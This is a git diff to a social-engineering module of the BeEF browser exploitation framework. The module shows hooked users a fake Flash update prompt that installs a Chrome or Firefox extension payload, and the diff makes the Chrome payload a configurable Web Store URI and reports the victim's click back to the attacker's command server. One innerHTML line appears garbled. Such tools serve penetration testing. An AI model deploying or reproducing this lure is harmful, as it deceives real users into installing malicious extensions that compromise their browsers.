diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
index 5facbda3a..0cc853ad6 100644
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -10,13 +10,13 @@ beef.execute(function() {
var image = "<%== @image %>";
var payload_type = "<%== @payload %>";
var payload_root = "<%== @payload_root %>";
-
- var chrome_extension = "/demos/adobe_flash_update.crx";
+ var chrome_store_uri = "<%== @chrome_store_uri %>";
var firefox_extension = "/api/ipec/ff_extension";
var payload = "";
+
switch (payload_type) {
case "Chrome_Extension":
- payload = payload_root + chrome_extension;
+ payload = chrome_store_uri;
break;
case "Firefox_Extension":
payload = payload_root + firefox_extension;
@@ -32,7 +32,9 @@ beef.execute(function() {
div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
div.setAttribute('align', 'center');
document.body.appendChild(div);
- div.innerHTML= '
';
+ // window.open is very useful when using data URI vectors and the IFrame/Object tag
+ // also, as the user is clicking on the link, the new tab opener is not blocked by the browser.
+ div.innerHTML= "![](\"")
";
$j("#splash").click(function () {
$j(this).hide();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
index c1b4fd4b7..cbdfaf4ff 100644
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -13,11 +13,11 @@ class Fake_flash_update < BeEF::Core::Command
return [
{'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image},
{'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root},
+ {'name' =>'chrome_store_uri', 'description' =>'Chrome WebStore Extension URI', 'ui_label'=>'Chrome WebStore Extension URI', 'value' => ""},
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
}
-
]
end